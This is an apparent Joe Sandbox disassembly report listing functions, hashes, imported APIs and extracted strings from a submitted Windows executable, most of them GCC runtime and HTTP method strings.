Instruction ID: 5172094441de8d06124f64fd95a8d69a39d9b77d421d2b2b4a90ae50cfeb3956
Opcode Fuzzy Hash: 6755e1622f3d3c4fa8f21a4e0fe1c3ea9f388b16dd995effa5171ebaab262e8f
Instruction Fuzzy Hash: 2E115076F01F158DEB00DFA5E8810AD77B8F709B98B601929DE5C63B19EF34C1618394

Function 00007FF72A04602A Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID: CaptureContextUnwindabort
String ID:
API String ID: 747564614-0
Opcode ID: 3f8f3c7c3e6270d6bc436fa0b11d008494d132dd46ed711f24fabb14169a842a
Instruction ID: 8b8ee92a13a908c7bf7b403a2b814da9820eefc9289af134227a80a8540ce9c5
Opcode Fuzzy Hash: 3f8f3c7c3e6270d6bc436fa0b11d008494d132dd46ed711f24fabb14169a842a
Instruction Fuzzy Hash: 7A019202F147C240FB21DB7599017ACA260EF99BC8F44D231DE4C27756EF6891C28320

Function 00007FF72A068457 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID: CaptureContextUnwindabort
String ID:
API String ID: 747564614-0
Opcode ID: 88a5ef570a513221deeda556a9c764416f2fdc6ec8df00f098b2e1ea7024f63c
Instruction ID: 735d9ce41b119880dfea9c2f83091a7849e72bf52b25cfcb53199ebb4f3d8d16
Opcode Fuzzy Hash: 88a5ef570a513221deeda556a9c764416f2fdc6ec8df00f098b2e1ea7024f63c
Instruction Fuzzy Hash: 6BE05015E8D11711FA687F611D225BDC261DF46B84FC428B0D90E17687ED1DB2016965

Function 00007FF72A04234D Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID: CaptureContextUnwindabort
String ID:
API String ID: 747564614-0
Opcode ID: 93b83f746264c1e8227f536a1122f88aaa7150999b4695e6dcae3133fe119d8f
Instruction ID: 6e91b9e12603957d9e4dc4f605d2d73bde196cf196ceb24467095490cdac59f1
Opcode Fuzzy Hash: 93b83f746264c1e8227f536a1122f88aaa7150999b4695e6dcae3133fe119d8f
Instruction Fuzzy Hash: 67F09612F4914694FF30BB11E8443B9E760EF49B88F486470DE0D1B396DD3DE4828B54

Function 00007FF729F9AB32 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 729ef516162f12b17a0891df4f125fc938104514095bee297d3f8b04a085cc37
Instruction ID: d8790b7c54407cf55b4b5e06ec68436e791e9dc03fac10550faadb4aadfd02bd
Opcode Fuzzy Hash: 729ef516162f12b17a0891df4f125fc938104514095bee297d3f8b04a085cc37
Instruction Fuzzy Hash: 49012472B04B158EF740DF69D8402AC37B0EB48788F444874DA1D97B68EB78DA518BA0

Function 00007FF72A044348 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID: CaptureContextUnwindabort
String ID:
API String ID: 747564614-0
Opcode ID: dfe3689a1a1bc98ad94ef8f52801c85596f2cbabbcd0db76e3036f3fa39c646d
Instruction ID: 248091e501c066a56d7a34347e1a50aa6b5ee9a17547bc7ba5ec0051d35e8c42
Opcode Fuzzy Hash: dfe3689a1a1bc98ad94ef8f52801c85596f2cbabbcd0db76e3036f3fa39c646d
Instruction Fuzzy Hash: 4AC01200E9E14340FAA87FA12C0A5F9C23AAF0BB80F8838B0E40F361C36C1DA0002CB4

Function 00007FF72A021CE8 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID: CaptureContextUnwindabort
String ID:
API String ID: 747564614-0
Opcode ID: 8c2be97f59e9b7290bea613212717df200ff73620f1f074a803c95ead892f177
Instruction ID: 45bfe1f474acb72769e29a733a1264655dd9584c279b54f47a7d708997be5199
Opcode Fuzzy Hash: 8c2be97f59e9b7290bea613212717df200ff73620f1f074a803c95ead892f177
Instruction Fuzzy Hash: 18C0CA14D4E21300F6A83FA12C0A4F9C02AAF47780F9838B0E80F261C36C0CA00029B5

Function 00007FF72A04434D Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID: CaptureContextUnwindabort
String ID:
API String ID: 747564614-0
Opcode ID: de9fada1d57f3fb15480b250e1812cc584fade96b87908de3236a1229bb3777a
Instruction ID: b2764f923d1f2097cb6f825084c5f1eb5c66073a0923a944884fc16561a6bbe4
Opcode Fuzzy Hash: de9fada1d57f3fb15480b250e1812cc584fade96b87908de3236a1229bb3777a
Instruction Fuzzy Hash: 20B09200D9E18390FAB43F512C095B8C679AF0BBC1E983CB0E41F361C36C1DE0002878

Function 00007FF72A021CED Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID: CaptureContextUnwindabort
String ID:
API String ID: 747564614-0
Opcode ID: e33d14cd70c7e249bad65a7e939737c55a2a044ab9b5064f473529a0d0db1fad
Instruction ID: bd6684726f49134a542205bd2571ec82889b6d0643c46a65c328a319f1b6ad07
Opcode Fuzzy Hash: e33d14cd70c7e249bad65a7e939737c55a2a044ab9b5064f473529a0d0db1fad
Instruction Fuzzy Hash: E9B04825D4E24340F6A43E911C094B8C06AEF4B780EA838B1D80E261C3AC0CA0412978

Function 00007FF729FBCBB0 Relevance: 66.7, APIs: 16, Strings: 22, Instructions: 164fileCOMMON

Download Yara Rule

APIs

memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,%s: __pos (which is %zu) > this->size() (which is %zu)), ref: 00007FF729FBCD28
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF729FBCDA1
fwrite.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF729FBCDB8
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF729FBCDCA
fputs.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF729FBCDD2
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF729FBCDDC
fwrite.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF729FBCDF3
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF729FBCE09
fputs.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF729FBCE11
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF729FBCE1D
fwrite.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF729FBCE38
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF729FBCE48
fwrite.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF729FBCE63
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF729FBCE68
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF72A0BA8C3,?,?,?,?,00007FF72A0C46CD,?,?,00000060,00007FF72A0C4BA1,000000B0,basic_string::_M_create), ref: 00007FF72A0C522A
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00007FF72A0BA8C3,?,?,?,?,00007FF72A0C46CD,?,?,00000060,00007FF72A0C4BA1,000000B0,basic_string::_M_create), ref: 00007FF72A0C5232

Part of subcall function 00007FF729F8BD60: strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF729F8BDE5
Part of subcall function 00007FF729F8BD60: memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00007FF729F8BDFE
Part of subcall function 00007FF729F8BD60: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF729F8BE09

Strings

gh space, xrefs: 00007FF729FBCBE6
https://, xrefs: 00007FF729FBCC1F
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 00007FF729FBCBB7
): , xrefs: 00007FF729FBCC51
rg/bugs/, xrefs: 00007FF729FBCC6D
l bug re, xrefs: 00007FF729FBCC9F
gcc.gnu., xrefs: 00007FF729FBCC5F
terminate called without an active exception, xrefs: 00007FF729FBCE2E
terminate called recursively, xrefs: 00007FF729FBCE59
https://, xrefs: 00007FF729FBCCE0
bmit ful, xrefs: 00007FF729FBCBD2
mat expa, xrefs: 00007FF729FBCBFA
lease su, xrefs: 00007FF729FBCC0E
for for, xrefs: 00007FF729FBCBF0
nsion (P, xrefs: 00007FF729FBCC04
port at , xrefs: 00007FF729FBCC31
not enou, xrefs: 00007FF729FBCBDC
terminate called after throwing an instance of ', xrefs: 00007FF729FBCDA8
bmit ful, xrefs: 00007FF729FBCCB4
port at , xrefs: 00007FF729FBCCC8
l bug re, xrefs: 00007FF729FBCBC8
org/bugs, xrefs: 00007FF729FBCC43

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID: __acrt_iob_func$fwrite$abortfputsfreememcpy$strlen
String ID: for for$%s: __pos (which is %zu) > this->size() (which is %zu)$): $bmit ful$bmit ful$gcc.gnu.$gh space$https://$https://$l bug re$l bug re$lease su$mat expa$not enou$nsion (P$org/bugs$port at $port at $rg/bugs/$terminate called after throwing an instance of '$terminate called recursively$terminate called without an active exception
API String ID: 843327088-170750575
Opcode ID: 9873b8585aa86bd0548a47e0d311a7902b6b8965eeda163c35c21c4eb738ea66
Instruction ID: c84160c01dbbf9a186c93add847279d9a85c25ea2049da35177a0fe64b22a496
Opcode Fuzzy Hash: 9873b8585aa86bd0548a47e0d311a7902b6b8965eeda163c35c21c4eb738ea66
Instruction Fuzzy Hash: 8861E521F0879285FB20AF61BC406ADA675FB45B94F944235EE9C17B89EF3CD201DB21

Function 00007FF729FC1990 Relevance: 19.8, APIs: 1, Strings: 12, Instructions: 293stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF729FC19C8

Strings

HEAD, xrefs: 00007FF729FC1B1D
DELETE, xrefs: 00007FF729FC1B89
TRACE, xrefs: 00007FF729FC1BF5
PRI, xrefs: 00007FF729FC1C3D
HTTP/1.0, xrefs: 00007FF729FC1D87
HTTP/1.1, xrefs: 00007FF729FC1D67
GET, xrefs: 00007FF729FC1AFC
CONNECT, xrefs: 00007FF729FC1BAD
PUT, xrefs: 00007FF729FC1B65
PATCH, xrefs: 00007FF729FC1C19
POST, xrefs: 00007FF729FC1B41
OPTIONS, xrefs: 00007FF729FC1BD1

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID: strlen
String ID: CONNECT$DELETE$GET$HEAD$HTTP/1.0$HTTP/1.1$OPTIONS$PATCH$POST$PRI$PUT$TRACE
API String ID: 39653677-2986041609
Opcode ID: 3475a15ad770d4e6921d672ba9c000cce732cdae77ded85629d71d3a8339cbcc
Instruction ID: f4dbc1a765788a78caa6a449592934ca20c1c750e11ed0c5519d58d263adba4e
Opcode Fuzzy Hash: 3475a15ad770d4e6921d672ba9c000cce732cdae77ded85629d71d3a8339cbcc
Instruction Fuzzy Hash: BCD11A76B05B8299EF70EF61EC543E863A5EB09788F844476CE0C4B79AEE28D345C750

Function 00007FF729FA42B0 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 209COMMON

Download Yara Rule

APIs

abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF729FA40BD,?,?,00007FF729F81146,?,00007FF72A0C5058), ref: 00007FF72A0C5000
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF729FA40BD,?,?,00007FF729F81146,?,00007FF72A0C5058), ref: 00007FF72A0C5010
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF729FA40BD,?,?,00007FF729F81146,?,00007FF72A0C5058), ref: 00007FF72A0C5020

Strings

what(): , xrefs: 00007FF72A0C51F3

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID: abort
String ID: what():
API String ID: 4206212132-593870882
Opcode ID: 951b2c14509b3b9ff06c7abb2130c4da9bb5aeb666ea34170b424332013cfbfb
Instruction ID: bcd546c3b4c57166100960d39018ee692ad2a6e6b6073145b1a5e11fb3a10ead
Opcode Fuzzy Hash: 951b2c14509b3b9ff06c7abb2130c4da9bb5aeb666ea34170b424332013cfbfb
Instruction Fuzzy Hash: 89513B50E1960740FB64BF6AAC6A3FD9262EF45B80FC85471E90D473C3EE2DE2019A71

Function 00007FF729F8D6D0 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 127COMMON

Download Yara Rule

APIs

RaiseException.KERNEL32 ref: 00007FF729F8D79E
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF729F8D7A4
RtlUnwindEx.KERNEL32 ref: 00007FF729F8D8BD

Strings

CCG!, xrefs: 00007FF729F8D6FA
CCG!, xrefs: 00007FF729F8D791
CCG , xrefs: 00007FF729F8D737
CCG", xrefs: 00007FF729F8D72C

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID: ExceptionRaiseUnwindabort
String ID: CCG $CCG!$CCG!$CCG"
API String ID: 4140830120-3707373406
Opcode ID: 93c96baf85275308103f298f691ed14aa899bab17562764589f220c8c6e58548
Instruction ID: 50ce2a3e066c72fc401fc6a2fd01f0b43cb6fc390e1d7be0c19f60a27ca9ca88
Opcode Fuzzy Hash: 93c96baf85275308103f298f691ed14aa899bab17562764589f220c8c6e58548
Instruction Fuzzy Hash: A6518337909A8482E7A09F15E8446ADB370FF89B94F985135EE8D53758DF3DD581CB00

Function 00007FF72A03DDE0 Relevance: 14.4, APIs: 4, Strings: 4, Instructions: 380COMMON

Download Yara Rule

Strings

basic_filebuf::underflow error reading the file, xrefs: 00007FF72A03E285
basic_filebuf::underflow incomplete character in file, xrefs: 00007FF72A03E0F6
basic_filebuf::underflow codecvt::max_length() is not valid, xrefs: 00007FF72A03E3D8
basic_filebuf::underflow invalid byte sequence in file, xrefs: 00007FF72A03E2FE

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID:
String ID: basic_filebuf::underflow codecvt::max_length() is not valid$basic_filebuf::underflow error reading the file$basic_filebuf::underflow incomplete character in file$basic_filebuf::underflow invalid byte sequence in file
API String ID: 0-2144588626
Opcode ID: 362a2d38bbbbf31715e0719b18adde177ff10ffcb86f89a7e4253875bb620e7b
Instruction ID: bd767ac5baea2dc67180a9f03da6b60b051201449ac789477e4a9ea8e02f9964
Opcode Fuzzy Hash: 362a2d38bbbbf31715e0719b18adde177ff10ffcb86f89a7e4253875bb620e7b
Instruction Fuzzy Hash: 66F19522E05B8684FB60AF25C9443B9A3A1FB55F98F988375DE4D07395EF38D484CB60

Function 00007FF72A03B890 Relevance: 14.4, APIs: 4, Strings: 4, Instructions: 356COMMON

Download Yara Rule

Strings

basic_filebuf::underflow error reading the file, xrefs: 00007FF72A03BCCD
basic_filebuf::underflow incomplete character in file, xrefs: 00007FF72A03BB82
basic_filebuf::underflow codecvt::max_length() is not valid, xrefs: 00007FF72A03BE62
basic_filebuf::underflow invalid byte sequence in file, xrefs: 00007FF72A03BD5E

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
